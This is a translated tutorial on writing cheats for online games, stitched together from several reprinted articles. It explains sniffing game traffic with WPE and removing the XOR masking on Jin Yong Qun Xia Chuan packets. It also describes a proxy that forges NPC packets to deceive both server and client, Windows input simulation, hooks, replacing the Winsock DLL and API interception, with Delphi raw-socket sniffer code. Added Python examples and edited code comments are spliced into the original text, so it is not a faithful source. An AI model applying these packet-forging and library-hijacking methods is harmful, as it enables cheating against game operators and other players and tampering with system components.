Game plug-in production guide (1)

xiaoxiao2021-03-05  25

If you want to become a veteran of game modification, you need a fairly rich body of computer knowledge. Many computer experts started out by playing and modifying games, gradually developed a strong interest in computers, and grew from there. Don't just envy what others can do: if they can do it, so can you! I believe that after reading this tutorial you will see games in a new light, heh, because I am a good teacher! (Don't throw eggs, that hurts! #¥%...*) But if you want to learn from game modification and raise your computer skills, you cannot limit yourself to modifying games. Understand that modifying games is only a place to verify some of the computer knowledge you already have; it only gives you opportunities to discover and solve problems and helps build your interest in learning about computers. It is not a shortcut to learning.

One: What is a plug-in?

Today's online games are built on the Internet client/server model. The server program runs on the game server; the game designers create a huge game world, and players everywhere log in to it by running the client program. Simply put, in an online game the developer provides the game environment, and players act relatively freely and openly within it. Since there is a server in the picture, the game modification methods we are used to lose much of their power. Remember how we changed a character's various attributes in single-player games? That was done by memory searching, and it does not work for online games, because all of the character's attributes and other important information are stored on the server; our own machine (the client) merely displays the character's state, so modifying the character's attributes in client memory is unrealistic. So is there no way at all to achieve our modifications in online games? The answer is no.
We know that communication in the Internet client/server model generally uses the TCP/IP protocol suite, and data exchange is done by transmitting IP packets. Normally our client sends the server a request, such as a move or attack command, and it is exchanged with the server in the form of packets. We call sending data from the local machine Send; after the server receives our Send it feeds the relevant information back to the client, such as the coordinates moved to or the type of battle. The information the client receives from the server we call Recv. Knowing this, the work we have to do is to analyze the data (that is, the packets) exchanged between client and server so that we can extract the data we want, then simulate the server sending to the client, or simulate the client sending to the server, and so achieve our modification. Besides modifying the game's packets, we can also modify the client program itself to meet our needs. The computing capacity of any server is limited, especially in games, where the server has to do the computation for every player in the game, so some operations are delegated to our client; this offers some convenience when modifying a game. For example, we can examine the client program to find the branches where it makes decisions and remove the checks that are unfavorable to us. In the next chapters we will cover the concept of the packet and the related knowledge for modifying the client.

Are you ready? Game data formats and storage: Before we start, we need some knowledge of how data is stored in the computer and the characteristics of data stored in games. This chapter is for rookies; if you are a master you may skip it. If you want to be an invincible swordsman, spend some time on it; if you only want to be a passing tourist of the rivers and lakes, then it makes no difference whether you understand it. Swordsman or tourist, you choose! Now let's start! First, you need to know several data formats used in games: bytes, words, and double words, that is, 8-bit, 16-bit and 32-bit storage. A byte holds a number from 0 to 255; a word (16-bit storage) holds 0 to 65535; a double word (32-bit storage) holds 0 to 4294967295. Why do you need to know this? The maximum values of the various parameters in a game differ: some only need about 100, for example the character level or the number of enemies in Jin Yong Qun Xia Chuan; some need more than 255 or even more than 65535, for example a character's money in Jin Yong Qun Xia Chuan can reach the millions. So different data in a game have different types, and when modifying a game you need to find the packet you intend to modify; judging the data type correctly is an important condition for quickly finding the right address. In the computer, data is organized in bytes, and each byte is given a number that determines its position; that number is called the address. When a word or double word is needed, the computer makes two consecutive bytes into a word and two consecutive words into a double word, and the address of a word or double word is the address of its low byte. On the Windows 9x systems we commonly use today, addresses are represented by 32-bit binary numbers.
When we refer to a memory address we usually write it as an 8-digit hexadecimal number. What are binary and hexadecimal? Simply put, binary uses only the digits 0 and 1 and carries at every two; likewise, hexadecimal carries at every sixteen. Hexadecimal has sixteen digits, 0 to F, where the values ten to fifteen are written with the letters A, B, C, D, E, F; their decimal equivalents are: A is 10, B is 11, C is 12, D is 13, E is 14, F is 15. Moreover, there is a simple correspondence between hexadecimal and binary: four binary digits equal one hexadecimal digit. For example, the four-bit binary number 1111 is hexadecimal F, and 1010 is A. Understanding this basic knowledge is a great help in modifying games, so let's continue with it. Since data in the computer is stored in binary, and the conversion between binary and hexadecimal is very simple, most modification tools display the data in the computer in hexadecimal, and you also need to enter hexadecimal numbers when modifying. Is that clear? The values you see in the game are decimal, so when you want to find and modify a parameter you can use the Calculator that Windows provides to convert between decimal and hexadecimal; you can find it under Accessories in the Programs group of the Start menu. That is about all you need to know for now! There is one more problem to pay attention to when modifying games, though: data in the computer is typically stored with the low-order part in the low byte and the high-order part in the high byte.

For example, decimal 41715 converts to hexadecimal A2F3, but in the computer it is stored as F3A2. Have you read the above? Do you understand the relationship between data and how it is stored? OK, now let's tell everyone how to go about it in the game. Everyone roll up your sleeves and let's get to work!

Second: What is a packet? How to capture packets? How to check the IP address and port number of the game server?

Whatever information services Internet users use, the communication can ultimately be reduced to transferring information in units of IP packets, and an IP packet carries the destination IP address, the source IP address and some related control information. When a router receives an IP packet it looks up its routing table by the packet's destination address and sends the packet out of the corresponding port based on the result; the next router does the same when it receives the packet, until it arrives at its destination. Routers exchange routing information with each other via routing protocols and update their routing tables accordingly. Since what we care about is the data inside the IP packets, we can use one of the many network sniffing tools to intercept the data exchanged between client and server. Here we introduce one of these tools: WPE.

WPE usage: when you run WPE you get the following functions to choose from.
Select Game: select the program you want to intercept from memory; just double-click the program name.
Trace: the tracking function, used to track and capture the packets sent. WPE must first know the name of the program to track before you can use this item. Press the PLAY key to start capturing. You can press || at any time to pause tracking, and press || again to resume. Press the square to stop capturing and display all captured packets. If you do not press the square stop button, tracking stops automatically according to the value set in Options. If you cannot capture anything, try setting Options to Winsock Version 2. WPE and Trainers require the display to be set to at least 16-bit color.
Filter: the filter function, used to analyze captured packets and modify them.
Send Packet: the send-packet function; lets you send a forged packet.
Trainer Maker: makes a trainer.
Options: the settings function; lets you adjust some of WPE's settings.

Filter, detailed teaching:
- When a Filter is enabled, its button shows red.
- After starting a Filter you can close the window at any time; the Filter stays in its state until you press the ON/OFF button again.
- Only when the Filter Enable button is OFF can you tick the box in front of the Filter to edit it.
- To edit a Filter, just double-click its name.

Normal Mode, example: In Strip Fighter Online you throw two fireballs and hit the other party. At this point you get the following packets:
Send-> 0000 08 14 21 06 01 04
Send-> 0000 02 09 87 00 00 00 00
Send-> 0000 03 84 11 09 11 09
Send-> 0000 0A 09 C1 10 00 00 FF 52 44
Send-> 0000 0A 09 C1 10 00 00 66 52 44
Your first fireball takes 16 HP from the other party (16 = 10h), and you observe that 10h appears at position 4 of the 4th and 5th packets, so it should be here.

You observe that the 0A 09 C1 before the 10h does not change between the two packets; clearly these three values are the key to throwing a fireball. So you fill 0A 09 C1 10 into the search column (Search), then fill FF into position 4 of the modify column (Modify). As a result, the next time you throw a fireball FF replaces the previous 10, which makes it a fireball of 255!

Advanced Mode, example: In a game you don't want to use your real name but want to send a modified fake name to the other side. After you use Trace you find your name in some of the packets. Suppose your name is Shadow, which in hexadecimal is 53 68 61 64 6F 77, and you plan to replace it with Moon, 6D 6F 6F 6E 20 20.
Send-> 0000 08 14 21 06 01 04
Send-> 0000 01 06 99 53 68 61 64 6F 77 00 01 05
Send-> 0000 03 84 11 09 11 09
Send-> 0000 0A 09 C1 10 00 53 68 61 64 6F 77 00 11
Send-> 0000 0A 09 C1 10 00 00 66 52 44
But look carefully: your name is not at the same position in each packet. In the 2nd packet the name starts at position 4; in the 4th packet it starts at position 6. So you need Advanced Mode:
- In the search column enter 53 68 61 64 6F 77 (be sure to fill it in starting from position 1).
- You want the new name to replace the original name Shadow wherever it is found, so choose "replace consecutive values from the position where the chain was found".
- Now, in the modify column, enter 6D 6F 6F 6E 20 20 starting at position 000, which corresponds to position 001 of the search column.
- If instead you want to modify a fixed position in the packet, choose "from the beginning of the packet".

Anyone who knows the basics of TCP/IP knows that information on the Internet is transferred after being split into packets. Each packet has two parts: header information and data. The header includes the packet's source and destination addresses and the like; the data includes all the information related to our operations in the game. So before we can do the packet capture we must know information such as the game server's IP address and port number. In fact, the easiest way is to see whether there is a Server.ini configuration file, from which you can read the game server's IP address; Jin Yong Qun Xia Chuan is one such case. Apart from that we can use netstat under DOS, which shows network connections, the routing table and network interface information and lets the user know which network connections are active. Or you can use tools such as Trojan to view network connections. There are many tools; use whichever you like. The general format of the netstat command is:
netstat [options]
The options mean the following:
-a display all sockets, including listening ones.
-c redisplay every second until the user interrupts it.
-i display information about all network interfaces.
-n show network IP addresses instead of names.
-r display the kernel routing table, in the format of "route -e".
-t show TCP connections.
-u show UDP connections.
-v display work in progress.

Three: How to analyze the packets we intercepted?

First we save the packets intercepted by WPE as a text file, then open it and see data like the following (here we use the data sent when fighting (PK) the shop assistant in Jin Yong Qun Xia as the example):
First file:
Send-> 0000 E6 56 0D 22 7E 6B E4 17 13 12 13 12 13 67 1B
Send-> 0010 17 12 DD 34 12 12 12 12 17 12 12 12 12 12 9B
Send-> 0000 E6 56 1E F1 29 06 17 12 3B 0E 17 1A
Send-> 0000 E6 56 1B C0 68 12 12 12 5A
Send-> 0000 E6 56 02 C8 13 C9 7E 6B E4 17 10 35 27 13 12 12
Send-> 0000 E6 56 17 C9 12
Second file:
Send-> 0000 83 33 68 47 1B 0E 81 72 76 77 77 77 77 77 77 07 1C 77 77 77 77 72 77 72 77 77 77 6D
Send-> 0000 83 33 7B 94 4C 63 72 77 5E 6B 72 F3
Send-> 0000 83 33 7E A5 21 77 77 77 3F
Send-> 0000 83 33 67 AD 76 CF 1B 0E 81 72 75 50 42 76 77 77
Send-> 0000 83 33 72 AC 77
We find that the two captures of fighting the shop assistant have the same format but different content. We fought the same NPC, so why are they different? Because the packets of Jin Yong Qun Xia Chuan are encrypted for transmission over the Internet. So the problem we face is decrypting the ciphertext into plaintext. Since packet encryption is generally XOR, let's talk about what XOR is. Simply put, XOR is "same gives 0, different gives 1", applied bit by bit. For example, 0001 XOR 0010, taken bit by bit, is 0011. The calculation: the 4th bit of 0001 is 0 and the 4th bit of 0010 is 0, which is the same, so by "same gives 0, different gives 1" the 4th bit of the result is 0; the 3rd bit of 0001 is 0 and the 3rd bit of 0010 is 0, so the 3rd bit of the result is 0; the 2nd bit of 0001 is 0 and the 2nd bit of 0010 is 1, so the 2nd bit of the result is 1; the 1st bit of 0001 is 1 and the 1st bit of 0010 is 0, so the 1st bit of the result is 1. Combined, that gives 0011.
You will meet XOR a lot later on; everyone should get familiar with it and skilled at using it in analysis.

Let's continue with the two files above. By common sense, not every byte of a packet carries a value; the developers reserve some byte space for future expansion, so a packet will contain some "00" bytes. Looking at the files above, there are many "12" bytes in file one and many "77" bytes in file two, so could these be our "00"? Let's try! We XOR file one with "12" and file two with "77". Doing this by hand is very tedious, so we use the "M2M 1.0 Encrypted Packet Analysis Tool", which is more convenient. The results:
First file:
1 SEND-> 0000 F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09
  SEND-> 0010 05 00 CF 26 00 00 00 00 05 00 1C 00 00 00 89
2 SEND-> 0000 F4 44 0C E3 3B 13 05 00 29 1C 05 08
3 SEND-> 0000 F4 44 09 D2 7A 00 00 00 00 48
4 SEND-> 0000 F4 44 10 DA 01 DB 6C 79 F6 05 02 27 35 01 00 00
5 SEND-> 0000 F4 44 05 DB 00
Second file:
1 SEND-> 0000 F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09
  SEND-> 0010 05 00 00 00 00 00 00 05 00 05 00 00 1A
2 SEND-> 0000 F4 44 0C E3 3B 13 05 00 29 1C 05 84
3 SEND-> 0000 F4 44 09 D2 56 00 00 00 48
4 SEND-> 0000 F4 44 10 DA 01 B8 6C 79 F6 05 02 27 35 01 00 00
5 SEND-> 0000 F4 44 05 DB 00
Now the two files are largely the same, which shows our reasoning was right: this is the plaintext we need! Next is to understand the meaning of some key bytes, which requires a large amount of data to analyze. First we notice that every packet begins with "F4 44", and that the third byte changes, but very regularly. Look at the length of each packet. Found it? Yes, the third byte is the packet length! By intercepting a large number of packets we determine that the 4th byte is the command, that is, what operation the client is telling the server to do. For example, the command requesting a battle from the server is "30", and the move command within a battle is "D4". Next we need to analyze the first packet above, "F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09 05 00 CF 26 00 00 00 05 00 1C 00 00 00 89": what information does it contain? It should tell the server which NPC you are fighting, so let's find the code of this shop assistant.

We fight (PK) a Little Luo Luo again (the one outside the Dali inn):
Send-> 0000 F4 44 1F 30 D4 75 F6 05 01 01 00 01 00 01 75 09
Send-> 0010 05 00 8A 19 00 00 00 00 00 11 00 02 00 00 00 C0
By common sense, although the number of NPC kinds in the game will not exceed 65535 (FFFF), the developers will not have limited it to a word, so as to leave room for expansion; so we look at double words. Comparing the "shop assistant" and "Little Luo Luo" packets, we narrow the target down to "6C 79 F6 05" and "CF 26 00 00". (Comparing is easy, but don't conclude too early, heh.) Let's look at the later packets. In the later packets there should also be an NPC code, for example in the move packet: when the game allows a move, the server must know the NPC's movement coordinates to broadcast to the other players watching the battle. In the 4th packet, "Send-> 0000 F4 44 10 DA 01 DB 6C 79 F6 05 02 27 35 01 00 00", we see "6C 79 F6 05" again: that is the shop assistant's code! (This analysis involves a lot of work; you can use the data captured with WPE to analyze it patiently.) The analysis of the first packet stops here for now (it contains other information, but we don't need to be clear about it). Look at the 4th packet, "Send-> 0000 F4 44 10 DA 01 DB 6C 79 F6 05 02 27 35 01 00 00", then capture the packet when fighting the yellow dogs (two dogs come out) and look at its format:
Send-> 0000 F4 44 1A DA 02 0B 4B 7D F6 05 02 27 35 01 00 00
Send-> 0010 EB 03 F8 05 02 27 36 01 00 00
By the above analysis the yellow dog's code is "4B 7D F6 05" (100040011). But how does the server distinguish the two yellow dogs? Look at "EB 03 F8 05" (100140011): it is the previous code plus 100,000, heh, so the server can tell the two dogs apart. We confirmed this with packets captured while fighting enemies in the wild. Sure enough.
Then the format of this packet should be fairly clear: the 3rd byte is the packet length, "DA" is the command, the 5th byte is the number of NPCs, and from the 7th byte on, 10 bytes represent one NPC's information; each additional NPC adds another 10 bytes. If you play Jin Yong online you will know that reinforcements sometimes arrive at random, and we use the game's reinforcement mechanism to add NPCs to each battle. By adding a packet during the battle, we find that the server sends a packet like: F4 44 12 E9 EB 03 F8 05 02 00 00 00 00 00 00 00, in which bytes 5 to 8 are the NPC's code (here illustrated simply with the yellow dog's code).
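The two steps just described, worked as a Python example added here (not code from the original article or from the tools it mentions): guessing the single-byte XOR mask from the most frequent byte of a capture, on the article's assumption that padding 00 bytes dominate, and then parsing the "F4 44 / length / command DA / NPC count / 10-byte NPC records" layout as the validation a server would apply before trusting an NPC list. The sample capture is constructed from the two plaintext DA packets quoted above, masked with 0x12 for the example; MAX_NPCS follows the article's estimate of about 20 records per 255-byte packet.

```python
from collections import Counter
import struct

MAGIC = b"\xF4\x44"      # every packet starts with F4 44
CMD_NPC_LIST = 0xDA      # command byte for "client sends NPC information"
NPC_RECORD_OFFSET = 6    # 0-based offset of the first record (article's "7th byte")
NPC_RECORD_LEN = 10      # one NPC record is 10 bytes
MAX_NPCS = 20            # article's rule of thumb for a one-byte length field


def guess_xor_key(masked: bytes) -> int:
    """Most frequent byte of the capture, assumed to be a masked 00 padding byte."""
    return Counter(masked).most_common(1)[0][0]


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def recover_capture(masked_packets):
    """Guess the mask over the whole capture and unmask every packet with it."""
    key = guess_xor_key(b"".join(masked_packets))
    return key, [xor_bytes(p, key) for p in masked_packets]


def parse_npc_list(pkt: bytes):
    """Return the little-endian NPC codes of a DA packet.

    Raises ValueError when the header fields contradict each other, which is
    the check a server needs so that a length byte or NPC count edited on the
    client side is rejected instead of trusted.
    """
    if len(pkt) < NPC_RECORD_OFFSET or pkt[:2] != MAGIC:
        raise ValueError("missing F4 44 header")
    length, cmd, count = pkt[2], pkt[3], pkt[4]
    if cmd != CMD_NPC_LIST:
        raise ValueError(f"command {cmd:02X} is not an NPC list")
    if length != len(pkt):
        raise ValueError(f"declared length {length} != actual {len(pkt)}")
    if count > MAX_NPCS:
        raise ValueError(f"{count} NPCs exceeds the {MAX_NPCS} that fit")
    if length != NPC_RECORD_OFFSET + count * NPC_RECORD_LEN:
        raise ValueError("NPC count does not match packet length")
    codes = []
    for i in range(count):
        off = NPC_RECORD_OFFSET + i * NPC_RECORD_LEN
        # first 4 bytes of each record: NPC code, low byte first (4B 7D F6 05 -> 100040011)
        codes.append(struct.unpack_from("<I", pkt, off)[0])
    return codes


def is_well_formed(pkt: bytes) -> bool:
    try:
        parse_npc_list(pkt)
        return True
    except ValueError:
        return False


# Constructed sample: the two plaintext DA packets quoted in the article,
# masked with 0x12 the way the article's "first file" was.
PLAIN_CAPTURE = [
    bytes.fromhex("F4 44 10 DA 01 DB 6C 79 F6 05 02 27 35 01 00 00"),
    bytes.fromhex("F4 44 1A DA 02 0B 4B 7D F6 05 02 27 35 01 00 00"
                  "EB 03 F8 05 02 27 36 01 00 00"),
]
MASK_KEY = 0x12
MASKED_CAPTURE = [xor_bytes(p, MASK_KEY) for p in PLAIN_CAPTURE]

# Constructed tampered copy: NPC count raised to 3 without adjusting the length
FORGED = PLAIN_CAPTURE[1][:4] + b"\x03" + PLAIN_CAPTURE[1][5:]

if __name__ == "__main__":
    key, plain = recover_capture(MASKED_CAPTURE)
    print(f"recovered mask byte: {key:02X}")
    for p in plain:
        print(p.hex(" ").upper(), "->", parse_npc_list(p))
    print("forged packet accepted?", is_well_formed(FORGED))
```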

So we use proxy technology to deceive the client and the server at the same time! OK, the work of calling NPCs is half done; how to modify packets and send packets continues in the next section.

Four: How to pretend to be the "client" sending the "server" the packets we need?

Here we need a tool that sits between the client and the server; its job is to receive and forward packets, and we call it a proxy. If the proxy's job were only receiving and forwarding it would be meaningless, but note: all packets must pass through it, and that is where the significance lies. We can analyze the received packets and forward them directly, modify them and forward them, or send the packets we need. Let's continue with how to cheat the server and the client at the same time, that is, modify packets and forge packets. From our earlier analysis we already know the format of the packet for fighting multiple NPCs, so let's do it! First we have to find the packet sent by the client that marks the start of a battle, which is the first packet of the battle request: we look for the signature "F4 44 1F 30", which does not change (after decryption, of course). Once found, it means the client is asking the server for a battle; we don't touch this packet, just forward it. Continuing down, the next signature is harder to find; let's look for "DA" first, the command for the client sending NPC information. There may be other "DA" bytes, but that doesn't matter: we check whether the bytes before it begin with "F4 44". After finding it, our work begins! We decide the number of NPCs to fight. This number cannot be very large, because the packet length in Jin Yong online is represented by one byte, so a packet can have at most 255 bytes, and as we analyzed, each added NPC adds 10 bytes; so everyone can count for themselves that about 20 NPCs is appropriate.
Then we calculate from the original NPC code in the client's packet, since each added NPC code should add 100000. Compute our added NPC codes, assemble them into a new packet, remembering to modify the byte that represents the packet length, then forward it to the server; when writing the program pay attention to the algorithm at this step so as not to introduce a large delay. That concludes deceiving the server; deceiving the client is simpler. After sending the packet above, we construct packets to send to the client according to the new NPC codes, in the format "F4 44 12 E9 NPC-code 02 00 00 00 00 00 00 00 00", building such a packet for each new NPC and sending them to the client one after another; the client is deceived as well, very simple. Other things will come up later in the battle; we won't go into them here.

The basic principles of game plug-ins have deeply influenced many online game players. Today I saw some techniques on writing game plug-ins, so I reprint them here for reference.

1. The general idea
Game plug-ins now come in many kinds, for example simulating the mouse, modifying packets and modifying local memory, but it seems nobody modifies server memory, heh. Actually modifying the server is also a way, but the technical bar is too high and there is no way to start.

(For example, taking the GM to a nightclub, gifts, money and so on can modify server data, haha.) Modifying a game is nothing more than modifying the data in local memory, or intercepting API functions, and so on. Here I will introduce the methods I can think of, hoping everyone can make good plug-ins so that game makers improve their own technology. I once read an article that was a theoretical analysis of Magic Baby; it wrote a lot, roughly along these lines. I will explain the technical points in order, as a brick thrown to draw out jade.

2. Technical analysis
2.1 Simulating the keyboard or mouse
We generally use the API function:

```c
UINT SendInput(UINT    nInputs,   // count of inputs
               LPINPUT pInputs,   // array of INPUT structures
               int     cbSize);   // size of one INPUT structure
```

The first parameter is the dimension of the array passed as the second parameter; the second parameter contains the events to replay. Fill in this structure first and you are done; it is very simple. This is the simplest way to simulate the keyboard and mouse, heh. Note that this function has alternatives:

```c
void keybd_event(BYTE      bVk,          // virtual-key code
                 BYTE      bScan,        // scan code
                 DWORD     dwFlags,
                 ULONG_PTR dwExtraInfo); // additional key state

void mouse_event(DWORD     dwFlags,      // motion and click options
                 DWORD     dx,           // horizontal position or change
                 DWORD     dy,           // vertical position or change
                 DWORD     dwData,       // wheel movement
                 ULONG_PTR dwExtraInfo); // application-defined information
```

These two functions are very simple; I think Button Elf works this way. The first simulates the keyboard, the second the mouse. That is only the simulation part; to connect to the game we need to find the game's window, or use a hotkey, just like the activation key of Button Elf. We can use the GetWindow function to enumerate windows, or use FindWindow to find a known window (note that there is also FindWindowEx, which can find the child windows of a window, such as buttons and so on).
When the game switches scenes we can use FindWindowEx to detect some characteristics of the current window and so judge whether we are still in that scene, for example using GetWindowInfo to check something; when you find a certain button, that tells you the game scene has switched, and so on. Some games have no controls inside; everything is drawn as images, so this method is limited and we need other means to assist the analysis. As for the hotkey, it must be implemented with a dynamic link library, using Hook technology, which is also very simple. Everyone knows it: it is really a global HOOK object, then SetWindowsHookEx, and the callback function is ready; there are plenty of examples online. This implementation is already very common in plug-ins. If anyone still doesn't understand, look up SetWindowsHookEx in MSDN.

Don't underestimate the role of this dynamic link library: it can be injected into every process's address space, that is, loaded into every game, and once you use it you will find it very useful. This requires you to review the basics of Win32 programming; hurry up and read the book.

2.2 Intercepting messages
Some games' response mechanisms are relatively simple: based on messages, or using a timer. Then you can intercept messages to implement some interesting features. Intercepting messages is again hook technology, covering keyboard messages, mouse messages, system messages, logs and so on; the rest is irrelevant, we only use the callback function of the message-intercepting hook, so I won't write an example for this. In fact it is the same as above, written with SetWindowsHookEx, and you will find it very simple. What to intercept is your business, for example doing some of our data processing in each timer message, or simulating a timer inside the timer so that some data is handled twice, heh. The consequences are not necessarily good, heh, but if the data calculation is placed on the client you can really change the data; try it. There are many other uses you can think of, heh.

2.3 Intercepting socket packets
This technique is much harder than the ones above. First we have to replace WINSOCK.DLL or WINSOCK32.DLL; the replacement we write must be consistent with the original: whatever functions it exports, ours must export the same functions, with identical parameters in identical order, and then inside our functions we call the function in the real Winsock32.dll. First: we can copy the replacement dynamic library into the system path. Second: when our application starts, load the original dynamic library with LoadLibrary, then get the entry address of each real socket function with GetProcAddress.
When the game runs it calls our dynamic library, which after doing its processing jumps to the real dynamic library, so we can process the data in it ourselves; it should be all of the data. Oh, exciting. After intercepting packets we still have to analyze them and respond correctly; don't think the work is done, it's early days. After the analysis is complete we also have to simulate the response mechanism to communicate with the server; one slip and you will be banned. Analyzing the data is the bulk of the workload, and the game will change its format, which is why we should write it so that whoever tampers with it afterwards gives up in despair.

2.4 Intercepting APIs
If we can use the techniques above flexibly we don't need to intercept API functions; this is really a supplementary technique. For example, if we need to intercept the socket as above we can use this technique, and in fact we can use it to intercept the functions in the socket directly, which is more direct. Tutorials on API interception are everywhere now, so I won't list them. The method I am used to is intercepting via the import table, which works on any operating system such as Windows 98/2000; the other methods are not cross-platform and I don't recommend them. You can learn this technique from page 545 of "Windows Core Programming", or for the Win98 system from the last chapter of "Windows System Mysteries".

Unveiling the core of online game plug-ins: packet capture
Online game packet capture technology is one of the concerns of most programming enthusiasts; let us study this question together with more programming enthusiasts.

Don't underestimate this problem; it is very popular technically, and there are many ways to achieve it (for example APIHOOK, VXD and Winsock2 can all do it). We cannot cover every technique and method here, so I will give a detailed explanation of the Winsock2 technique, even if only as a brick thrown to draw out jade. Since most readers are not well acquainted with it, I introduce the related knowledge here:
APIHOOK: since Windows provides its functionality through the API, everyone has to go through the API; in other words, to capture packets you must know and capture this API and get the packet information from it.
VXD: capture the packet information directly by controlling a VXD driver, but VXD can only be used on Win9x.
Winsock2: Winsock is the Windows network programming interface; it works at the application layer and provides a high-level data transfer programming interface that is independent of the underlying transport protocol. Winsock2 is the service provider interface provided by Winsock 2.0, but it can only be used on Win2000.
OK, let's start Winsock2 capture programming. I divide packet programming into two steps: 1. capturing the packet; 2. dissecting the packet. First we have to achieve the capture: the Winsock unit that Delphi ships is 1.0, so naturally Winsock2 is not used. If we want to use Winsock2 we have to make a Winsock2 interface in Delphi; then we can use Winsock2.
1. How do we make the Winsock2 interface?
1) First we must define the types Winsock 2.0 uses; here we demonstrate with the WSA_DATA type, and you can do the rest by analogy.

We must know that the WSA_DATA type is used by WSAStartup(WSData: TWSA_DATA): Integer, and you will notice that WSData is a reference (var) parameter, so what is passed in is the address of the variable. We therefore wrap WSA_DATA as follows:

    const
      WSADESCRIPTION_LEN = 256;
      WSASYS_STATUS_LEN = 128;

    type
      PWSA_DATA = ^TWSA_DATA;
      WSA_DATA = record
        wVersion: Word;
        wHighVersion: Word;
        szDescription: array[0..WSADESCRIPTION_LEN] of Char;
        szSystemStatus: array[0..WSASYS_STATUS_LEN] of Char;
        iMaxSockets: Word;
        iMaxUdpDg: Word;
        lpVendorInfo: PChar;
      end;
      TWSA_DATA = WSA_DATA;

2) We need to import the Winsock2 functions from WS2_32.DLL; again we take WSAStartup as the example:

    function WSAStartup(wVersionRequired: Word; var WSData: TWSA_DATA): Integer; stdcall;

    implementation

    const
      WinSocket2 = 'WS2_32.DLL';

    function WSAStartup; external WinSocket2 name 'WSAStartup';

By the method above we can build the Winsock2 interface, and with it we can use Winsock2 to capture packets (you must have a network card, though). Because a working capture touches on security, we take IP packets as the example here; if anything is unclear, please check MSDN.

1) We first have to start up WSA with the WSAStartup function, used as follows:

    function WSAStartup(wVersionRequired: Word; var WSData: TWSA_DATA): Integer;

2) Obtain a socket handle with the socket function, declared and used as follows:

    function socket(af: Integer; typ: Integer; protocol: Integer): Integer;

    m_hSocket := socket(AF_INET, SOCK_RAW, IPPROTO_IP);

m_hSocket is the socket handle; AF_INET, SOCK_RAW and IPPROTO_IP are constants.

3) Define the SOCK_ADDR type, fill it with our network card's IP, and then bind our NIC with the bind function. The declarations and the call are as follows:

    type
      in_addr = record
        S_addr: LongWord;   // fixed: inet_addr returns a 32-bit address, not a PChar
      end;

      TSOCK_ADDR = record
        sin_family: Word;
        sin_port: Word;
        sin_addr: in_addr;
        sin_zero: array[0..7] of Char;
      end;

    var
      LocalAddr: TSOCK_ADDR;

    LocalAddr.sin_family := AF_INET;
    LocalAddr.sin_port := 0;
    LocalAddr.sin_addr.S_addr := inet_addr('192.168.1.1'); // put your own network card's IP address here; inet_addr is a Winsock2 function
    bind(m_hSocket, LocalAddr, SizeOf(LocalAddr));

4) Use WSAIoctl to register the WSA input/output control; it is declared as follows:

    function WSAIoctl(s: Integer; dwIoControlCode: Integer;
      lpvInBuffer: Pointer; cbInBuffer: Integer;
      lpvOutBuffer: Pointer; cbOutBuffer: Integer;
      lpcbBytesReturned: Pointer;
      lpOverlapped: Pointer; lpCompletionRoutine: Pointer): Integer;

5) Next, receive the data inside an endless loop. Call Sleep() inside the loop, otherwise the program will misbehave.

6) Inside the loop, receive the data with the recv function, declared as follows (Buffer is an untyped var parameter, for example an array[0..4095] of Byte):

    function recv(s: Integer; var Buffer; Length: Integer; Flags: Integer): Integer;

7) Buffer now holds the data we received. If we want to know where the data came from, we have to define the IP header structure and use CopyMemory() to read the IP information out of Buffer; note that what is read out is raw binary and has to be converted before it can be displayed.

I looked at the captured packets and it felt like a good start, but I have to tell you that capturing packets is the easy part: many game packets are encrypted, and if you want to understand what is inside, you have to decrypt them.

Four: online game plug-in design methods

When I saw other people using plug-ins in online games, as a programmer I felt uncomfortable and wanted to figure out what was going on.
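Returning to step 7 of the packet-capture procedure above: it reads the IP header out of the receive buffer and notes that the raw bytes must be converted before they can be shown. As an added example (my own code, not from the original article or from any tool it mentions), here is a Python parser for the IPv4 header that does that conversion and also verifies the header checksum, which a capture tool should do before trusting a packet. The packet bytes are constructed inline so the code runs offline; the addresses, ports and payload in it are made up.

```python
import socket
import struct


def ipv4_checksum(data: bytes) -> int:
    """RFC 791 ones'-complement checksum over 16-bit words.

    Over a complete, valid header (stored checksum included) the result is 0.
    """
    if len(data) % 2:
        data += b"\x00"
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:                      # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4_header(buf: bytes) -> dict:
    """Decode the IPv4 header at the start of a raw-socket receive buffer."""
    if len(buf) < 20:
        raise ValueError("buffer shorter than the minimum IPv4 header")
    (ver_ihl, _tos, total_len, ident, flags_frag,
     ttl, proto, _hdr_csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", buf[:20])
    version = ver_ihl >> 4
    ihl = (ver_ihl & 0x0F) * 4              # header length in bytes, options included
    if version != 4:
        raise ValueError(f"not an IPv4 packet (version {version})")
    if ihl < 20 or ihl > len(buf) or total_len < ihl:
        raise ValueError("inconsistent header length fields")
    return {
        "version": version,
        "header_length": ihl,
        "total_length": total_len,
        "identification": ident,
        "dont_fragment": bool(flags_frag & 0x4000),
        "more_fragments": bool(flags_frag & 0x2000),
        "fragment_offset": flags_frag & 0x1FFF,
        "ttl": ttl,
        "protocol": proto,                  # 1 = ICMP, 6 = TCP, 17 = UDP
        "src": socket.inet_ntoa(src),
        "dst": socket.inet_ntoa(dst),
        "checksum_ok": ipv4_checksum(buf[:ihl]) == 0,
        "payload": buf[ihl:total_len],      # what a protocol analyser looks at next
    }


def build_sample_packet() -> bytes:
    """Constructed sample: a TCP segment from 192.168.1.1 to 10.0.0.5 (made-up addresses)."""
    payload = b"\x04\xd2\x00\x50" + b"CONSTRUCTED-SAMPLE"   # fake ports 1234 -> 80 plus filler
    total_len = 20 + len(payload)
    header = struct.pack("!BBHHHBBH4s4s",
                         0x45, 0, total_len, 0x1234, 0x4000, 64, 6, 0,
                         socket.inet_aton("192.168.1.1"), socket.inet_aton("10.0.0.5"))
    csum = ipv4_checksum(header)            # computed with the checksum field zeroed
    header = header[:10] + struct.pack("!H", csum) + header[12:]
    return header + payload


if __name__ == "__main__":
    info = parse_ipv4_header(build_sample_packet())
    print(f"{info['src']} -> {info['dst']} proto={info['protocol']} "
          f"len={info['total_length']} checksum_ok={info['checksum_ok']}")
```

The length checks matter on a raw socket: a short or truncated buffer must not be indexed as if a full header were present, and a packet whose checksum fails should be counted and dropped rather than fed to the protocol analysis.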
